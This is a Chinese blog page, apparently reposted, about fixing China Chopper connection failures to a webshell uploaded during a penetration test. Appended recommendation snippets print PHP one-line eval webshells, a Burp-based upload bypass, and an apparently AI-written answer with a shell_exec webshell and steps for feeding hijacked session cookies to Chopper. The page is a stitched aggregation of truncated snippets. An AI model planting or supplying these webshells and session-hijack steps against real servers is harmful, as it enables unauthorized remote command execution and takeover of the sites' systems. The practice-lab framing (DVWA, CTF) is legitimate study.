菜刀不能成功连接已上传木马

最新推荐文章于 2024-08-14 18:34:13 发布
转载 最新推荐文章于 2024-08-14 18:34:13 发布 · 1.5w 阅读 · 12 ·
CC 4.0 BY-SA版权
原文链接:https://yq.aliyun.com/articles/505478
文章标签:

#php #shell #运维

前言

  今天在渗透测试是通过后台上传了一个木马,并能成功访问,但是用菜刀却连接不上,如图1,图2所示:
图1
图1
图2
图2

解决方法

  刚开始我以为是我的菜刀的问题,于是丢给一个朋友,但是他反应不能访问,于是想到可能是没有登录的原因,导致没有权限访问!
此时我们需要使用菜刀进行登录网站,然后再用菜刀连接木马!首先我们在菜刀的链接处选中浏览网站,如图3所示:
图3
图3
然后去输入登录页面地址,使用账号进行登录,当成功登录之后,我们就再次去访问我们的木马,发现可成功通过木马连接上服务器!



本文转自 eth10 51CTO博客,原文链接:http://blog.51cto.com/eth10/2048319

记一次上传图片马无法链接菜刀(蚁剑)的方法解决
qq_61426144的博客
07-28 2028
复制地址链接发现报错,这里提一点,你的路径不对或者asp的网站你上传php的图片马是无法执行一句话木马的,还有就是密码也要正确才能成功链接,(这里不包括实战免杀和能否过安全狗)经过我的测试是因为中国菜刀工具版本过低,然后蚁剑的版本是32的也链接不上,换中国菜刀高版本的测试成功链接和64位的蚁剑也是成功练剑,如下两张图片所示。于是我们利用上传一个图片马然后将上传链接复制到数据库路径,然后在数据库名称将我们的图片马修改成mm.asp或者xx.asp都行,然后访问链接执行我们的图片马之后成功执行。
一句话php木马制作教程_菜刀无法正常访问一句话问题
weixin_35092037的博客
12-21 1960
今天自己搭建了一个php版的xss cookie接收平台。为了图操作上的方便,给自己的web放了一句话木马。但是当我打开菜刀连接时,报了500错误,如图想到可能是php版本问题导致这个问题的。查看了一下服务器上的php版本,7.0.33抓包查看菜刀数据: 去掉z0数据访问正常 那么问题点在z0数据了,解密z0数据: 看到解密后的z0数据,一下想到了...
解决中国菜刀连接失败问题
Suuannnn的博客
11-07 8787
今天上传了一个一句话木马,但是怎么也连接不上,抓了个包发现我的php里面的代码出现了特殊字符。 原来原因就出在了编码上,于是我回去检查了一下自己的编码,原来是一不小心用了utf16,把他换回utf8就OK了,心酸!!记录一下 ...
菜刀连接不上DVWA
sunquan705的博客
07-20 739
菜刀无法连接成功上传一句话后的情况
题解--内部文件上传系统漏洞分析溯源---墨者学院(菜刀连接失败问题解决)
weixin_43071873的博客
09-01 1695
1.解题方向 1、试探允许上传的文件类型 2、观察服务器在处理完上传任务后返回的内容,获取上传路径 3、尝试修改上传路径,观察服务器是否允许写入权限 4.PS:使用菜刀时可能出现连接不上靶机,可以尝试点击左上角,有个重置缓存,很有可能是因为上次使用菜刀留下的缓存冲突了 进入靶场。 测试可上传的文件,发现txt,jpg,png等格式都可以上传 上传php、asp等都不能上传 2.由于txt可上传,所以可以在txt中写入一句话木马 文件上传到了一个asp文件中,所以可以考虑写入asp一句话 <%eva
DVWA中国菜刀连接不上问题(低安全级别就连不上,看看这!!)
S__White的博客
10-30 6422
测试环境:虚拟机搭建DVWA,php7.3.4 连接工具:中国菜刀 安全级别:LOW 上传一句话木马过程省略 解决发生: 解决问题: 将php版本降低为php5.0即可 (小白一枚,解决第一个问题,记录一下,希望可以帮到很多人!!) ...
解决DVWA(Low级别)中国菜刀连接失败问题(php版本问题)
myec_lipse的博客
04-22 2910
今天在DVWA平台上上传了个一句话木马,用中国菜刀连接了一下发现连接不上,百度了大半天,发现是php版本问题,之前在win7虚拟机上安装的XAMPP7的php版本是php7.x版本的,需要降低一下版本,度娘说降低到5.x版本就可以连接上了(因为啥咱也不知道咱也不敢问)。研究了半天感觉改来改去的太麻烦了就直接下了个XAMPP5,复制了一下XAMPP7的DVWA文件到XAMPP5上,在5的DVWA平台上上传了一个一句话木马菜刀就能正常连接了,棒呆! ...
dvwa问题篇 -- 菜刀蚁剑连接不上图片木马 -- 小黑解决教程
G_WEB_Xie的博客
12-27 1500
各位小伙伴初次玩dvwa会出现各种问题,本来想把一些问题直接总结写一篇dvwa文章来着,但因为都是关键字搜索,所以将一些问题都拆分出来,以便大家方便查类似问题。(大家有遇到不一样的问题欢迎投稿!1、需要在菜刀上访问dvwa,设定为low级别,访问该图片。2、phpstudy的php版本过高将为5.0版本即可。菜刀蚁剑连接不上图片木马
php一句话木马菜刀,如何基于菜刀PHP一句话实现单个文件批量上传
weixin_35741494的博客
03-09 2078
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀php一句话为例来分析一下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。下面是最常见...
Python网络安全项目开发实战_看清文件上传木马_编程案例解析实例详解课程教程.pdf
04-27
在网络安全领域,文件上传木马是一个重要的议题,尤其在Python网络安全项目开发中。黑客常常利用文件上传漏洞来植入木马,以控制服务器。文件上传木马的类型主要分为大马和小马,根据文件大小来区分。小马通常用于...
ctf中国菜刀连接一句话木马
weixin_41038905的博客
05-06 7039
中国菜刀下载地址,试了好几个版本的就这个好用: https://pan.baidu.com/share/link?shareid=871753024&uk=388464620 上传一句话木马: <?php @eval($_POST['hacker'])?> 将一句话木马另存为one.jpg,通过Burp抓包改包上传为one.php 通过菜刀连接: 在空白位置右键-》添加 ...
中国菜刀+文件上传漏洞一句话木马
dongxieaitonglao的博客
03-19 2448
<?php @eval($_POST['chopper']);?> <?php @eval($_REQUEST['cmd']);?> REQUEST是在网页端输入变量访问,POST则是使用中国菜刀之3类的工具连接,C/S架构。 编辑shell的时候,主机写 localhost egrep命令:查找文件内包含指定字符的文件。 中国菜刀的详细使用: 文件管理,查被上传木马网站的服务器文件架构 数据库管理,在编辑中配置完后,可以连接上传木马网站的数据库(不知道,所以需要sql注入
复现mysql 备份上传木马,并用shell工具连接操作
weixin_64655821的博客
08-25 434
复现mysql 备份上传木马,并用shell工具连接操作
记一次上传一句话木马无法链接的情况
qq_61426144的博客
08-14 853
首先问题的前提是在密码和地址正确的情况下,依然无法正常链接,但是一句话木马又是可以正常执行的情况下,依然无法链接,(这里补充一点是在没有免杀的环境下、不然的话还要考虑木马是否免杀和过狗)此时有两种解决办法。因为这些工具在较低版本是会出现一些错误导致无法正常链接,所以可以更换最新版本的工具试一试。一、更换比较新版的工具,例如:菜刀、蚁剑、哥斯拉、冰蝎等链接工具。这里我展示的是中国菜刀,其它的工具也大同小异,清空一下缓存即可。
菜刀不能成功连接上传***
weixin_34306676的博客
12-07 2501
前言   今天在***测试是通过后台上传了一个***,并能成功访问,但是用菜刀连接不上,如图1,图2所示:                  图1                  图2 解决方法   刚开始我以为是我的菜刀的问题,于是丢给一个朋友,但是他反应不能访问,于是想到可能是没有登录的原因,导致没有权限访问!  此时我们需要使用菜刀进行登录网站,然后再用菜刀连接***!首先我们在菜刀的链...
10-菜刀连接木马
tianxiadiiw的博客
04-16 974
可以获取你想要的配置信息,也可以用system函数来输入命令。是属于辅助工具,并且菜刀的传输过程是明文传输的,目前已经被WAF进行防护了。接下来就可以连接菜刀,使用菜刀连接木马然后就可以查看到服务器里面的东西了。先看是否存在注入点,有下图所示则表示存在注入点==》可以进行接下来的操作。2、木马必须是POST请求,参数自定义,在菜刀里给出正确的参数名。写入一句话的木马进行探测,如果嗅探成功后在进行大马的上传。找到了漏洞后,并且上传木马之后才能使用的两款工具。有文件,则说明可以读任意路径的文件。
文件上传一句话木马,用菜刀进行连接
XY011009的博客
12-02 9433
菜刀工具 提取码:tg6t 关于文件上传 文件上传是指由于网站没有任何过滤或者防护措施有限,而会被上传一些恶意文件,有些用户利用这个漏洞上传一句话木马(webshell),上传成功后就可以利用中国菜刀工具来进行对这个网站后一步的攻击。 1.无任何上传限制 这里可以直接上传一句话木马然后用菜刀工具进行连接 2.限制了文件类型 有些网站会有对文件类型限制的,发送文件的途中网站会对文件的类型进行检测,看...
文件上传漏洞—蚁剑连接地址错误、一句话木马php语法错误
热门推荐
Xionghuimin的博客
06-02 3万+
题目 第一步:把写有<?php phpinfo(); ?>代码的txt文件改文件名为infor.jpg,上传过程中用burpsuite抓包修改为infor.php。提示上传成功后在url中可以打开 第二步:把写有 <? php phpinfo(); @eval($_POST['shell']); ?> 代码的txt文件改文件名为infors.jpg,上传过程中用burpsuite抓包修改为infors.php。提示上传成功后在url中打开但是什么也没有显示,蚁剑也连接不上。
中国蚁剑简介
m0_73721944的博客
03-28 2468
一句话木马:在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此。中国蚁剑和中国菜刀类似,是一款webshell终端管理工具,主要面向合法授权的渗透测试安全人员及常规操作的管理员。(1)php的代码要写在
菜刀连接 cookie
最新发布
03-23
### 菜刀工具使用 Cookie 进行连接的方法 菜刀是一种常用的 WebShell 工具,广泛应用于渗透测试和安全研究领域。为了实现通过 Cookie 的方式连接目标服务器上的木马文件,以下是具体的说明: #### 1. 准备工作 在开始之前,确保已经上传了一个支持身份验证机制的 PHP 文件到目标服务器上。该文件可以通过 POST 请求或其他方式进行交互,并返回相应的会话信息(如 Session ID 或 Token)。这些信息通常存储在浏览器中的 Cookies 中。 #### 2. 配置目标地址与路径 打开菜刀软件,在界面中填写目标 URL 地址以及对应的 Shell 文件路径。如果目标站点启用了 HTTPS 协议,则需要勾选 SSL/TLS 加密选项以保障通信的安全性[^1]。 #### 3. 设置认证参数 当面对需要身份验证才能访问的 Webshell 时,可以在菜刀界面上指定请求头内的额外字段来满足条件。对于基于 Cookie 认证的情况来说: - 找到程序设置区域; - 添加名为 `Cookie` 的 HTTP Header 参数; - 将实际登录成功后获得的有效值填入其中作为其内容部分[^5]。 例如,假设从合法用户的操作过程中截获到了如下形式的一个有效 session cookie 字符串: ``` PHPSESSID=abcdefg123456789; ``` 那么就应该这样配置: ```plaintext Header Name: Cookie Header Value: PHPSESSID=abcdefg123456789; ``` #### 4. 测试连接 完成上述步骤之后点击“连接”按钮即可尝试建立控制通道。此时菜刀将会按照设定好的规则发送包含特定 cookies 的 HTTP 请求至远程主机并解析响应数据包从而达到操控目的[^4]。 需要注意的是,由于不同版本或者自定义开发出来的 web shells 可能存在差异因此可能还需要调整其他一些细节比如编码方式等等才能够顺利完成整个流程[^3]。 --- ### 示例代码片段 下面展示了一段简单的 PHP Webshell 示例代码,它接受来自客户端传递过来的数据并通过 system() 函数执行命令后再把结果回显出来供使用者查看分析。 ```php <?php if(isset($_POST['cmd'])){ echo "<pre>"; $output = shell_exec($_POST['cmd']); echo htmlspecialchars($output); echo "</pre>"; } ?> ``` 此脚本允许任何能够向其提交表单的人运行任意操作系统级别的指令——当然前提是他们知道正确的端点名称(`cmd`)并且具有适当权限去触发这个逻辑分支[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值